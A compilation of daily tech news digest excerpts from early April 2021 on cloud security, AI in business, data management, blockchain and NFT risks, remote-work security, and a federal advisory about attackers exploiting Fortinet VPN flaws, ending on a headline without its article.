Daily Tech Digest - April 06, 2021

How Confidential Computing is dispelling the climate of distrust around cloud security

Confidential Computing offers a number of additional advantages that go beyond simple safeguarding. By ensuring that data is processed in a shielded environment it is possible to securely collaborate with partners without compromising IP or divulging proprietary information. ... Until now, many enterprises have held back from migrating some of their most sensitive applications to the cloud because of worries about data exposure. Confidential computing addresses this hurdle; not only is data protected during processing, companies can also securely and efficiently collaborate with partners in the cloud. For businesses migrating workloads into the cloud, a major concern is the ability to provide security for customers and continued compliance with EU data privacy regulations. This is especially the case where businesses are the stewards of sensitive data, such as healthcare information or bank account numbers. An important feature of Confidential Computing is its use of embedded encryption keys, which locks data in a secure enclave during processing. This keeps it concealed from the operating system as well as any privileged users i.e. administrators or site reliability engineers.


A Good Data Scientist Should Combine Domain-Specific Knowledge With Technical Competence

Technological expertise augmented by strong domain knowledge is important for an aspiring data scientist. One should have a clear understanding of the rules and practices of the industry before applying technological aspects to it. Be it automotive, BFSI, manufacturing or ecommerce, you can be a good data scientist in the field if you couple domain-specific knowledge with technical competence. Ideal candidates would have a degree or background knowledge of computer science or information technology. Data science is vast and may not suit everyone. Therefore, it is vital to have an aptitude to understand the data, see patterns, analyse from different perspectives and present findings to suit the end-user while also being open to understanding the domain. ... Industry partnerships are crucial to educational institutions. The two key components of a data science course are the fundamental conceptual foundation laid by highly qualified academicians and industry stalwarts with on-ground expertise and visibility. Both ensure that the key takeaways are beyond theoretical knowledge and include practical insights and understanding.


Can Digital Twins Help Modernize Electric Grids?

Digital twins could help guide decision-making as California completes its transition to 100% renewables, according to Parris, who points out that GE Digital is working with Southern California Edison, one of the state’s three largest investor-owned utility, to help model its operations. However, the mix of renewables in in the Golden State, not to mention Gov. Gavin Newsom’s ban on gasoline- and diesel-powered cars starting in 2035, will make it much harder to find a balance than in the Lone Star State. “It’s not just the heating [and cooling] of the buildings, but the cars,” Parris says. “It will be more distributed energy resources, like EVs [electric vehicles]. How do I bring them in? They add another complexity, because I don’t know when you’re going to charge your EV. I don’t know how much you’re going to use your car.” Backers of renewable energy are banking on large battery plants being able to handle short-term spikes in energy demand that have traditionally been handled by natural gas-powered “peaker” plants in California. But grid-scale battery technology is still unproven, and it also introduces more variables into the grid equation that will have to be accounted for. How long does that battery live [is] based on how often you charge and discharge it, so the life of the battery is a factor,” Parris says.


Stop Calling Everything AI, Machine-Learning Pioneer Says

Computers have not become intelligent per se, but they have provided capabilities that augment human intelligence, he writes. Moreover, they have excelled at low-level pattern-recognition capabilities that could be performed in principle by humans but at great cost. Machine learning–based systems are able to detect fraud in financial transactions at massive scale, for example, thereby catalyzing electronic commerce. They are essential in the modeling and control of supply chains in manufacturing and health care. They also help insurance agents, doctors, educators, and filmmakers. Despite such developments being referred to as “AI technology,” he writes, the underlying systems do not involve high-level reasoning or thought. The systems do not form the kinds of semantic representations and inferences that humans are capable of. They do not formulate and pursue long-term goals. “For the foreseeable future, computers will not be able to match humans in their ability to reason abstractly about real-world situations,” he writes. “We will need well-thought-out interactions of humans and computers to solve our most pressing problems. ...”


AI And HR Tech: Three Critical Questions Leaders Need To Support Diverse Teams

When dealing with HR AI tech, the limitations around diversity are the by-product of how solutions are designed. We are rapidly moving into space where solutions provide emotional recognition. AI analyzes facial expressions or body posture to determine decisions around recruitment. Current estimates expect emotion recognition is projected to be worth $25billion by 2023. Despite extraordinary growth in this area, there are challenges and significant kinks to be addressed, namely, ethical elements concerning the creation of the algorithms. Companies are grappling with HR AI and ethics. Recent examples demonstrate the enormity of the ramifications when things don't go according to plan. In other words, when things go wrong, they go badly wrong. Consider, for example, Uber, when fourteen couriers were fired due to a failure of recognition by facial identification software. In this case, the technology based on Microsoft's face-matching software has a track record of failing to identify darker-skinned faces, with 20.8 percent failure rate for darker-skinned female faces. The same technology has zero percent failure for white men.


How AI Can Solve The COBOL Challenge

Fortunately, using an old-school approach to AI and applying that to a different scope of the problem can save developers time in finding code by automating the process of precisely identifying the code that requires attention — regardless of how spread out it might be. Much like how contemporary AI tools cannot comprehend a book in a way a human does, human developers struggle to comprehend the intent of previous developers encoded in the software. By describing behaviors that need to change to AI tools, developers no longer have to labor searching through and understanding code to get to the specific lines implementing that behavior. Instead, developers can quickly and efficiently find potential bugs. Rather than dealing with a deluge of code and spending weeks searching for functionality, developers can collaborate with the AI tool to rapidly get to the code on which they need to work. This approach requires a different kind of AI: one that doesn’t focus on assisting the developer with syntax. Instead, AI that focuses on understanding the intent of the code is able to “reimagine” what computation represents into concepts, thereby doing what a developer does when they code — but at machine speed.


Secure API Design With OpenAPI Specification

API security is at the forefront of cybersecurity. Emerging trends and technologies like cloud-native applications, serverless, microservices, single-page applications, and mobile and IoT devices have led to the proliferation of APIs. Application components are no longer internal objects communicating with each other on a single machine within a single process — they are APIs talking to each other over a network. This significantly increases the attack surface. Moreover, by discovering and attacking back-end APIs, attackers can often bypass the front-end controls and directly access sensitive data and critical internal components. This has led to the proliferation of API attacks. Every week, there are new API vulnerabilities reported in the news. OWASP now has a separate list of top 10 vulnerabilities specifically for APIs. And Gartner estimates that by 2022, APIs are going to become the number one attack vector. Traditional web application firewalls (WAF) with their manually configured deny and allow rules are not able to determine which API call is legitimate and which one is an attack. For them, all calls are just GETs and POSTs with some JSON being exchanged.


Zero Trust creator talks about implementation, misconceptions, strategy

“The strategic concepts of Zero Trust have not changed since I created the original concept, through I have refined some of the terminologies,” he told Help Net Security. “I used to say that the first step in the five-step deployment model was to ‘Define Your Data.’ Now I say that the first step is to ‘Define Your Protect Surface.’ My idea of a protect surface centers on the understanding that the attack surface is massive and always growing and expanding, which makes dealing with it an unscalable problem. I have inverted the idea of an attack surface to create protect surfaces, which are orders of magnitude smaller and easily known.” Among the pitfalls that organizations that opt to implement a zero-trust model should try to avoid he singles out two: thinking that Zero Trust is binary (that either everything is Zero Trust or none of it is), and deploying products without a strategy. “Zero Trust is incremental. It is built out one protect surface at a time so that it is done in an iterative and non-disruptive manner,” he explained. He also advises starting with creating zero-trust networks for the least sensitive/critical protect surfaces first, and then slowly working one’s way towards implementing Zero Trust for the more and the most critical ones.


How can businesses gain the most value from their cloud investments?

Innovation can come from the smallest and simplest of places. And the chances are, the cloud can take your business there, whether it’s to be more productive or agile, more sustainable, or secure. The important thing is for this vision to be clear, well communicated, and considered in all tech investments, hires and processes. For example, if a business wants to make better use of data across its operations, technologies such as IoT, AI and robotics will be critical to gathering, deciphering, and actioning that data across the cloud. Businesses will also be hiring and developing the talent to operate these tools. And we know this isn’t easy. UK businesses are hungry for cloud computing skills and the talent pool is not as big as they would like. They will also be thinking about the platforms available that enable the entire organisation — not just the tech team — to partake in this culture of data-driven operations. On the other hand, perhaps a business wants their cloud investment to bring them cost savings — a key driver for many migrations. To do successfully, CIOs will need to think strategically about how they are leveraging the cloud’s pay as you go ‘as a service’ model, whether they are using technologies, such as cloud virtualisation, to be more efficient or unlock revenue opportunities.


NFT Thefts Reveal Security Risks in Coupling Private Keys & Digital Assets

Like other blockchain-based platforms, NFT marketplaces are targeted by hackers. The centralized design of the marketplaces and the high value attached to NFTs make them prized targets. They can be subject to a range of attack vectors, including phishing, insider threats, supply chain attacks, brute-force attacks against account credentials, ransomware, and even distributed denial-of-service attacks. Blockchain design encompassing NFTs provides certain fundamental properties applicable to security, such as immutability and integrity checks. Immutability inherent in blockchain design is considered one of the core tenets of any transaction-security strategy. It's introduced to create a single source of truth and supports nonrepudiation, which is crucial for accountability of actions. But this still does not guard the platform against attacks leading to an account takeover (ATO), a major threat. There is a clear, exploitable scenario here as once an NFT has been transferred to someone else's wallet or sold, it may not be recovered by the sender or a third party. Enabling private keys to serve as gatekeepers is bound to create concentrated risk in one area, leading to a single-point-of-failure scenario.



Quote for the day:

"Most people live with pleasant illusions, but leaders must deal with hard realities." -- Orrin Woodward

Daily Tech Digest - April 05, 2021

Encrypted method that measures encounters could slow down or prevent future pandemics

Current approaches for mitigating the spread of infectious disease in a population include exposure notification systems, also known as contact tracing, that rely on the pseudonyms. These systems are currently used on smartphones as a way to digitally track if a person comes into contact with someone who has contracted COVID-19. This can help health officials mitigate the spread of the disease by isolating individuals at risk of infecting others. But the benefit of this method that uses encounter IDs is its promotion of privacy. By labeling each encounter with a random number and not linking the encounter to the device the person is carrying, this makes it much harder for a cyber attacker to obtain that user’s identity. The target audience for this approach would be for a smaller population in a controlled setting like NIST‘s campus or nursing homes, said researcher Angela Robinson, also an author of the new paper. “We are advancing a different approach to contact tracing using encounter metrics.” Gathering these measurements of how individuals interact with one another can help with better understanding ways of modifying working environments, such as altering building layouts and establishing mobility rules, so as to slow the spread of disease.


Blockchain and taking the politics out of tech

One of the biggest problems and challenges in the world of crypto is how do you make sure that people who are transacting in crypto are not sending money to terrorists or not using crypto to engage in money laundering. And it’s a problem because the whole promise of crypto is to allow people to transact peer to peer without the need for a bank limit, right? So normally if you’re writing a check, it goes to the banking system and the bank looks to see who the payee is and figure out if they’re on some list or if you’re using cash there are these currency transaction reports you have to fill out. ... Blockchain identity verification is making probabilistic judgments based on a large amount of data. So, it may not know for sure that you’re not Vladimir Putin. But what it does know is that you’re a person who bought a latte at a Starbucks in Palo Alto yesterday of that you’re a person who has a Netflix subscription you’ve been paying on for 23 months And so when we make these probabilistic judgments, we can reduce to a statistical low rate the likelihood that you’re engaged in some kind of malfeasance.


Data lineage: What it is and why it’s important

Data lineage is comprised of methodologies and tools that expose data’s life cycle and help answer questions around who, when, where, why, and how data changes. It’s a discipline within metadata management and is often a featured capability of data catalogs that allow data consumers to understand the context of data they are utilizing for decision-making and other business purposes. One way to explain data lineage is that it’s the GPS of data that provides “turn-by-turn directions and a visual overview of the completely mapped route.” Others view data lineage as a core datagovops practice, where data lineage, testing, and sandboxes are data governance’s technical practices and automation opportunities. Capturing and understanding data lineage is important for several reasons: Compliance requirements: Many organizations must implement data lineage to stay on the good side of government regulators. Data lineage in risk management and reporting is required for capital market trading firms to support BCBS 239 and MiFID II regulations. For large banks, automating extracting lineage from source systems can save significant IT time and reduce risks. In pharmaceutical clinical trials, the ADaM standard requires traceability between analysis and source data.


7 Ways to Reduce Cyber Threats From Remote Workers

This hybrid work model comes with advantages and disadvantages — and among the disadvantages is a sharp rise in the number of cyber threats and vulnerabilities. When employees connect to organizational servers, databases, and intranets via the Internet, they are really working at a remote endpoint of the corporate office. But unlike in office-based environments, they are not as diligently protected. Therefore, CISOs need to view home-based devices as integral parts of IT and mandate that the devices, as well as the people using them, undergo the same level of security as they would when operating from the office. Like any other maturity improvement program, organizations must grapple with the challenges posed by their people (employees, third-party vendors, and so on), processes, and technology and implement the necessary security measures to protect them. ... To avoid breaches, employers need to implement employee training courses with a focus on the latest threat scenarios. Management, operations, and R&D are all prime targets of social engineering, phishing, and scamming campaigns (among other threats). 


How To Remove Ransomware From Android Phone Easily?

First, you will need to restart your phone in safe mode. Different Android phones have different ways in which this method takes place. Find out how to do it on your device. Once you have the right method, your screen will show that your phone is starting in safe mode. When your device is in safe mode, third-party apps are not running. This may or may not include the malware depending on how it is developed. Once your phone is running on safe mode, you can now check your installed apps. You can do this by going to Settings then to Apps. On the list of apps installed in your phone, look for apps that you don’t remember installing. When you find an app that looks suspicious, uninstall it from your phone. Depending on how you use your phone, you may have a long list of apps to go through. Make sure to get all the apps in the device and remove all that are suspicious or don’t use as often. After you are through with the uninstallation process, head to your phone security settings. Here, look for apps under the device administrators section. If you find any apps that are suspicious in this section, deny them the rights to be administrators on your phone and also uninstall them. They may have let the malware in.


The wholesale financial services firm of the future cannot survive without AI

Compliance is the first major front. Regulatory changes come into effect over the course of the next year which require forensic oversight of large amounts of documentation: a task that is too slow, error-prone and expensive to be completed manually. LIBOR, Basel IV and Dodd-Frank QFC recordkeeping requirements place more and more demands on financial services companies and many simply aren’t adequately prepared. ... The second area is market risk. The volatility of markets in the past year means that transparent oversight is critical. This is where AI comes into its own. AI technology can automate the processing and analysis of the documentation which underpins much of the financial system, from loan agreements to insurance policies. This means that work which would previously have entailed long hours can be accelerated, allowing for vastly improved efficiency and speed and, critically, much better oversight of the compliance requirements which regulators mandate. AI gives institutions the ability to remain vigilant and to keep abreast of risks with much more efficiency than ever before. With market conditions likely to remain volatile throughout 2021, fast, responsive and data-backed decisions aren’t only essential for each institution, they are critical for the health of the financial system as a whole.


Fake Unemployment Benefit Websites Preying On Laid-Off Workers, Experts Warn

You may want to take several additional steps to avoid these and other scams, says Sadler, whose company uses artificial intelligence to detect patterns in legitimate and potentially fraudulent emails and to automatically block potential threats. Besides considering an email security system at home or work, Sadler said, “It’s important for people to employ two-factor authentication and to not use the same password across different sites — those are two of the best steps you can take” for better online security. He also suggests getting a password manager, such as RoboForm, 1Password, Keeper, Norton, or a similar tool that can generate your passwords, distribute them across multiple sites, and protect them with encryption software to guard against hackers. Don’t automatically trust an email asking for private information even if the email address looks legitimate, he added. “People may be trained to look out for [bizarre requests],” Sadler said, “and they may be on alert if the email address is unfamiliar. But sometimes the email account itself is compromised, and the phishing email is using a falsified IP address... If you're unsure, you can verify the legitimacy of the sender by calling the organization directly.”


AI at Your Service

From a CX and EX optimization perspective, the point of an AI system is to increase automation efficiencies. If AI can resolve an issue while communicating in a humanlike manner, operations have been optimized effectively and that particular issue doesn’t need to be escalated to a live person and tap into limited resources. ... This also empowers the employees to refocus on more complex, rewarding tasks that require human attention. Let’s look at an example of how AI is utilized in the healthcare industry. A patient comes in with a skin problem. If it’s an anomaly, the doctor may have to do more research, run a series of tests, get a second opinion, etc. Compare that to an AI system, which can look at hundreds and thousands of cases of a similar skin condition and, in a nanosecond, give a diagnosis that’s 90% accurate. That’s a genuine interactive process between a human and an AI system. In addition to reducing costs and freeing up personnel for more business-critical tasks, AI can build brand loyalty for an organization. In Formation.ai’s study, Brand Loyalty 2020: The Need for Hyper-Individualization, 79% of consumers stated that the more personalized tactics a brand uses, the more loyal the customer is to the brand. In fact, 81% of consumers will share basic personal information in exchange for a more personalized customer experience.


What is a streaming database?

Some streaming databases are designed to dramatically reduce the size of the data to save storage costs. They can, say, replace a value collected every second with an average computed over a day. Storing only the average can make long-term tracking economically feasible. Streaming opens up some of the insides of a traditional database. Standard databases also track a stream of events, but they’re usually limited to changes in data records. The sequence of INSERTs, UPDATEs, and DELETEs are normally stored in a hidden journal or ledger inside. In most cases, the developers don’t have direct access to these streams. They’re only offered access to the tables that show the current values. Streaming databases open up this flow and makes it simpler for developers to adjust how the new data is integrated. Developers can adjust how the streams from new data are turned into tabular summaries, ensuring that the right values are computed and saved while the unneeded information is ignored. The opportunity to tune this stage of the data pipeline allows streaming databases to handle markedly larger datasets.


Why Data Democratization Should Be Your Guiding Principle for 2021

Data, and universal access to it, is key for today’s companies to create new opportunities and unlock the value embedded within their organization – all of which can positively impact a company’s top and bottom line. True data democratization pushes organizations to rethink and maybe even restructure, which often means driving a dramatic cultural change in order to realize financial gain. It also means freeing information from the silos created by internal departmental data, customer data, and external data, and turning it into a borderless ecosystem of information. The trouble is many companies aren’t that good at it. Our research last year initially suggested senior decision-makers were confident that they were opening up access to data sufficiently. However, when we scratched a little deeper, we found almost half (46%) of respondents believed that data democratization wasn’t feasible for them. IT infrastructure challenges were cited by almost four out of five respondents as a blocker to democratizing data in their organization. Performance limitations, infrastructure constraints, and bottlenecks are all standing in the way.



Quote for the day:

"Don't necessarily avoid sharp edges. Occasionally they are necessary to leadership." -- Donald Rumsfeld

Daily Tech Digest - April 04, 2021

Compositional AI: The Future of Enterprise AI

Compositionality refers to the ability to form new (composite) services by combining the capabilities of existing (component) services. The existing services may themselves be composite, leading to a hierarchical composition. The concept is not new, and has been studied previously in different contexts; most notably, Web Services Composition and Secure Composition of Security Protocols. Web Services follow the Service Oriented Computing (SOC) approach of wrapping a business functionality in a self-contained Service. There are mainly two approaches to composing a service: dynamic and static. In the dynamic approach, given a complex user request, the system comes up with a plan to fulfill the request depending on the capabilities of available Web services at run-time. In the static approach, given a set of Web services, composite services are defined manually at design-time combining their capabilities. ... In the very primitive world of supervised learning, an AI Service consists of data used to train a model, which is then exposed as an API. There is of course an alternate deployment pipeline, where a trained model can be deployed on an edge device to be executed in an offline fashion.


Four common pitfalls of HyperLedger implementation

One of the main goals of distributed ledger technology (DLT), used by HyperLedger, is decentralization. The nodes (servers) of the network should be spread among all organizations in the consortium and they should not depend on the third party providers. However, we have seen implementations where the whole infrastructure is maintained by one organization or where it is spread among the organizations but all of them host their nodes provided by the same cloud vendor (e.g. AWS). With centralized infrastructure comes the threat that one organization or external provider could easily turn off the system and thus break the principal goal of DLT. ... One of the extremes in defining permissions in the DLT network, contrary to limiting the access of an organization, is privileging one of the organizations in such a way that it can make any changes to the distributed ledger. As such configuration does not have to introduce a vulnerability, it is against blockchain rules. We have met different implementations with this issue that all allowed one organization can freely modify the contents. The channel endorsement policy required the signature only from one organization. 


ETL vs. Data Preparation

ETL relies on a predetermined set of rules and workflows, she said. Potential issues, such as misspellings or extra characters, must be anticipated beforehand so rules for how to deal with those issues can be built into the end-to-end workflow. Conversely, a data prep tool using built-in algorithms is capable of discovery and investigation of the data as it proceeds through the workflow. “For example, algorithms based on machine learning or natural language processing can recognize things that are spelled differently but are really the same.” She gave the example of a city called “St. Louis”, and how it could be entered in multiple ways, or there may be several cities with the same name spelled differently. In an ETL workflow, rules for encountering each particular variation must be programmed ahead of time, and variations not programmed are skipped. A data prep tool can find spelling differences without help, so that the user does not have to anticipate every possible variation. The tool can prompt for a decision on each different variation on the name of this city, providing an opportunity to improve the data before it’s used, she said.


The coming opportunity in consumer lending

The second major step is to build the decision engine. In this area, new entrants will have a large advantage over existing lenders with legacy software that they do not want to alter. The new decision engine can largely be built using advanced analytics, machine learning, and other tools that capitalize on speed and agility. By using machine learning, the new-entrant lenders will be able to automate as much as 95 percent of underwriting processes while also making more accurate credit decisions. Similarly, real-time machine-learning solutions can improve pricing and limit setting and help firms monitor existing customers and credit lines through smarter early-warning systems. Lenders can also use straight-through processing to generate faster transactions and a better customer experience. The design of the decision engine can be modular for maximum flexibility. That will allow lenders to retain control of strategic processes while potentially outsourcing other parts. The modular format can also facilitate risk assessment. This approach involves a series of steps, completely integrated from the front end to the back end, and is designed for objective and quick decision making


WhatsApp Privacy Controversy and India’s Data Protection Bill

Clause 40 of the PDP bill is particularly dangerous and could be detrimental to the data rights of the users of WhatsApp. This provision empowers the Data Protection Authority to include certain data fiduciaries in a regulatory sandbox who would be exempt from the obligation of taking the consent of the data principal in processing their data for up to 36 months. The GDPR does not have any provision related to the regulatory sandbox. Such a sandbox might be required to provide relaxations to certain corporations, such as those that deal with Artificial Intelligence so that they can test their technology in a Sandbox environment. However, it is a commonly accepted practice that in a good regulatory sandbox the users whose data is taken voluntarily participate in the exercise. Such a condition is altogether done away with by this provision. The authority that has to assess the applications for inclusion in a regulatory Sandbox is the Data Protection Authority (DPA). The members of the DPA are to be selected by bureaucrats serving under the Union government. So, it cannot be expected to work independently of government control (Clause 42(2)).


A Data Science Wish List for 2021 and Beyond

Sometimes, we simply cannot overcome the problem of needing more data. It could be that data collection is too expensive or the data is not possible to collect in a reasonable time frame. This is where synthetic data can provide real value. Synthetic data can be created by training a model to understand available data to such an extent that it can generate new data points that look, act, and feel real, i.e. mimic the existing data. An example could be a model that predicts how likely small and medium-sized businesses (SMBs) in the retail sector might be to default on loans. Factors such as location, number of employees, and annual turnover, might be key features in this scenario. A synthetic data model could learn the typical values of these features and create new data points that fit seamlessly into the real dataset, which can then be expanded and used to train an advanced loan default prediction model. ... Another benefit of synthetic data is data privacy. In the financial services industry, much of the data is sensitive and there are many legal barriers to sharing datasets. Leveraging synthetic data is one way we can reduce these barriers as synthetic datapoints feel real but do not relate to real accounts and individuals.


Top 4 Blockchain Risks A CIO Should Know

Blockchain risks lead to malicious activities such as double-spending and record hacking, which means a hacker will try to steal a blockchain participants’ or cryptocurrency owner’s credentials and transfer money to his/her account or hold the credentials as leverage for ransom. As per MIT’s 2019 report, since 2017, hackers have stolen around $2 million worth of cryptocurrency. Another malicious activity is double-spending, where hackers access the majority of the power and rewrite the transaction history. This allows them to spend the cryptocurrency and erase the transaction from history once they receive their orders. With digital money, the hacker can send the merchant a copy of the digital token while retaining the original token and using it again. Implementing and maintaining blockchain applications and platforms is expensive. If there is a fault in the working or the system fails due to the blockchain risks, it will cost a massive amount of money to fix things. A blockchain expert is required to overcome such risks, and the expert may charge a hefty amount to provide solutions.


Top Challenges Involved In Healthcare Data Management

Medical data is sensitive and must adhere to government regulations, such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA) in the US. Data discovery challenges and poor data quality make it much more difficult to perform the required audits, meet regulatory requirements and limit the diversity of data healthcare providers can use for the benefit of patients. Adhering to the HIPAA rules may help in effective data governance. Effective data governance within a healthcare organization can help better manage and use data, create processes for resolving data issues and eventually, and enable users to make decisions based on high-quality information assets. However, all this begins with better data collection and making sure that the data collected is accurate, up-to-date, complete, and in compliance with the HIPAA regulatory standards. A well-designed HIPAA-compliant web form solution can be instrumental in enabling healthcare organizations to manage and streamline data collection processes, including – new patient forms, HIPAA release forms, contact update forms, patient medical history forms, and consent forms.


CDO's Next Major Task: Enabling Data Access for Non-Analysts

Unlike product managers from two decades ago, today's product manager wants to look at the user flow data on the website and design changes to UX flow to improve revenue. He doesn't have the luxury of a dedicated analyst supporting him for every question he has about his product. The marketing manager has direct hands-on access to the CRM system. He is pulling targeted customers for the next campaign and needs to have a lifetime value score for each of the customers to target the highest value customers effectively. To resolve the customer concerns quickly, customer support agents need access to what happened when the customer accessed the website two days ago. He doesn't have the luxury of the SLA of one-week resolution time of yesteryears; the customer expects resolution during the call. The CDO needs a proper plan to enable appropriate access to the right kind of data to the right person, with the right security level. Barring that, the business's numerous stakeholders will start standing up their individual mini data marts to serve their needs. If that happens, the CDO's past five years of centralizing data sources will amount to nothing. What is needed is a proper data access strategy and governance for the entire enterprise.


Why ML should be written as pipelines from the get-go

Data scientists are not trained or equipped to be diligent to care about production concepts such as reproducibility — they are trained to iterate and experiment. They don’t really care about code quality and it is probably not in the best interest of the company at an early point to be super diligent in enforcing these standards, given the trade-off between speed and overhead. Therefore, what is required is an implementation of a framework that is flexible but enforces production standards from the get-go. A very natural way of implementing this is via some form of pipeline framework that exposes an automated, standardized way to run ML experiments in a controlled environment. ML is inherently a process that can be broken down into individual, concrete steps (e.g. preprocessing, training, evaluating, etc), so a pipeline is a good solution here. Critically, by standardizing the development of these pipelines at the early stages, organizations can lose the cycle of destruction/recreation of ML models through multiple toolings and steps, and hasten the speed of research to deployment.



Quote for the day:

“Just because you’re a beginner doesn’t mean you can’t have strength.” -- Claudio Toyama

Daily Tech Digest - April 03, 2021

What Is a Cybersecurity Legal Practice?

A cybersecurity attorney is not an auditor; this attorney does not sit in an ivory tower doing oversight of the company’s information technology work. Instead, corporate officers must recognize that a cybersecurity attorney must be a part of the operational team. The attorney should be as involved in the company’s operations as the information technology expert deploying new defensive measures in the company’s networks. An effective cybersecurity attorney has to be in the trenches, helping to develop the statements of work for new contracts, negotiating information-sharing agreements, advising on legal risks associated with the many and varied daily decisions of securing networks, and managing the hour-by-hour response during an incident. ... Finally, a cybersecurity attorney must be multilingual in the jargon of both law and tech. One of the key jobs of such an attorney is to translate legal requirements (such as obligations imposed by regulations) into design requirements and to understand the technical details enough to ask probing questions, spot legal issues and translate risks to organizational leadership.


3 steps to meeting data privacy regulation compliance through identity programs

This focus on security, however, isn’t just a reaction to more cyberattacks. It also correlates with the enormous acceleration in digital transformation initiatives over the last year. Some industry experts dubbed it the shift from “cloud speed to COVID speed.” The pandemic forced a new way of working, and this ultimately means a new way of ensuring the security of how we work. It also means that companies store and manage more data in the cloud, which comes with its own regulatory compliance challenges. Every new process moved to the cloud, automated or made digital, has become a new vulnerability. Security teams need to manage these vulnerabilities to protect the data from a cyber-attack and ensure compliance with the latest data privacy regulations, such as the General Data Protection Regulation (GDPR) or the California Privacy Rights Act (CPRA). Other non-compliance issues will grow over the next year, especially as companies continue to remotely onboard and offboard customers and employees. These new processes will impact how to protect data and comply with the multiple different patchwork privacy regulations from various states and countries.


Speed and resilience: Five priorities for the next five months

Over the past year, organizations have become well versed in the basics of ensuring a safe working environment. More recently, however, companies have reported that some of their workers appear to be more willing to participate in higher-risk activities simply because they are tired of living with virus restrictions. This will require a different type of intervention and messaging, especially because newer COVID-19 variants pose a high risk and may be transmitted in ways that are not yet fully understood. Employers have a unique societal role to play in vaccination; they are important voices and can help reduce the friction associated with getting the vaccine. Self-reported data from a wide range of organizations point to individual and team productivity being higher than before the onset of the pandemic, but not uniformly so. According to a McKinsey survey, productivity is up for about half of all workers, with the other half reporting no change or lower productivity. The same survey suggested that, while the inability to disconnect is a real concern, increased productivity is correlated to a willingness to change how people work. 


Quantum computing may be able to solve the age-old problem of reasoning

The results show that the quantum machine could use inference models to draw conclusions. Probabilistic inference, which means the incorporation of uncertainty into computer programming, is particularly suited to quantum computers, Fiorentini said, because "quantum models have been proven to be more expressive, easier to train under certain circumstances." In practical terms, this means that quantum computing can be useful to solve both scientific and engineering problems. The results are "quite flexible, surprisingly robust, and can be applied in many fields," said Fiorentini. For instance, he added, Bayesian networks have traditionally been used in predictive maintenance of mission-critical equipment, such as jetliners and jet engines. "You model a system, and then you perform inference on the model by asking certain questions and by figuring out if the system is stable, reliable, and robust--or is about to break down--so you can intervene," Fiorentini said. "And which part is signaling the stress more strongly?" Medical diagnostics is another field that can benefit from these results. Although it can't be exactly applied from the results of this study, "continuing in this direction, some of these techniques are applied to drug discovery," Fiorentini noted.


FBI: APTs Actively Exploiting Fortinet VPN Security Holes

Once exploited, the attackers are moving laterally and carrying out reconnaissance on targets, according to officials. “The APT actors may be using any or all of these CVEs to gain access to networks across multiple critical-infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,” the warning explained. “APT actors may use other CVEs or common exploitation techniques—such as spear-phishing—to gain access to critical infrastructure networks to pre-position for follow-on attacks.” The joint cybersecurity advisory from the FBI and CISA follows last year’s flurry of advisories from U.S. agencies about APT groups using unpatched vulnerabilities to target federal agencies and commercial organizations. For instance, in October an alert went out that APTs were using flaws in outdated VPN technologies from Fortinet, Palo Alto Networks and Pulse Secure to carry out cyberattacks on targets in the United States and overseas. “It’s no surprise to see additional Fortinet FortiOS vulnerabilities like CVE-2019-5591 and CVE-2020-12812 added to the list of known, but unpatched flaws being leveraged by these threat actors,” said Narang.


How AI-powered BI tools will redefine enterprise decision-making

In this fourth wave, the traditional order of BI will be inverted. The traditional method of BI generally begins with a technical analyst investigating a specific question. For example, an electronics retailer may wonder if a higher diversity of refrigerator models in specific geographies will likely increase sales. The analyst blends relevant data sources (perhaps an inventory management system and a billing system) and investigates whether there is a correlation. Once the analyst has completed the work, they present a conclusion about past behavior. They then create a visualization for business decision makers in a system like a Tableau or Looker, which can be revisited as the data changes. This investigation method works quite well, assuming the analyst asks the right questions, the number of variables is relatively well-understood and finite, and the future continues to look somewhat similar to the past. However, this paradigm presents several potential challenges in the future as companies continue to accumulate new types of data, business models and distribution channels evolve, and real-time consumer and competitive adjustments cause constant disruptions.


How Going Back to Coding After 10 Years Almost Crushed Me

Containers, namely Docker, have really streamlined packaging and reduced env-related issues as you move code thru QA and into production. In the old days, you would develop in a system entirely different than where it was deployed (i.e. code on Windows and deploy to Unix), which invariably led to bugs and more work on each test and release cycle. Also, in the past, a release, QA, or DevOps engineer would take code from an SCM tag and figure out how to compile, test, and migrate it — and usually uncover a whole bunch of hardcoded paths and variables or missing libraries and files that needed to be reworked or hacked up to work. ... I remember fairly long release cycles (as long as three months at a startup). After attending specification meetings to understand the requirements line by line, a developer could go to their desk and play games for a few weeks without having to issue a dreaded update on where they were. Now, you have a daily standup and two-week sprint, so there is no more slacking! The role of the BA has also diminished with Agile, as developers now face users or product managers directly.


3 Reasons In-Memory Computing Is Essential for Microservices

The more advanced in-memory platforms support high-performance multiregion global architectures. This enables zero-downtime business operations via a high-performance shared memory layer that supports them. This also simplifies scaling up these services to more fully leverage the promise of cloud native and serverless. They also provide features such as automated disaster recovery, zero down-time code deployments (blue-green deployments), rolling product upgrades, as well as tools to integrate these seamlessly into modern cloud DevOps automation tools and new AIOps tools that help monitor these architectures and deliver auto-scaling and autonomous troubleshooting. For a concrete example of how these could be employed, imagine having many microservices in an online shopping application These include separate capabilities that power browsing for products, adding and removing items from a shopping cart and so on. More so, each one of these microservices can be somewhat independent from one another. But, some actions like checking out, fulfillment and shipping may require multistep orchestration and some roll-back behavior.


Keeping your data safe from hackers while working from home

One of the big changes the move towards remote working has brought about is removing employees from the protection of the corporate firewall. Working from inside the office provides people with anti-virus and other protections that can help to filter out some attacks. Now, instead of this, many people are working from their own computer from their homes, where they may not have anti-virus at all – and their home router won't provide a robust defence against attackers like a corporate firewall would. Criminals know this and are looking to take advantage with cyberattacks, especially when people – rushed off their feet while balancing working from home with the rest of their life – might unintentionally click on a phishing link or respond to a request that appears to come from a colleague but is actually a cyber criminal. "Humans are are ultimately fallible. Unfortunately it's the organic matter behind the keyboard, which is often the vulnerable part of the loop," says Troy Hunt, creator of HaveIBeenPwned and digital advisor to Nord Security. 


Booking.Com's GDPR Fine Should Serve as 'Wake-Up Call'

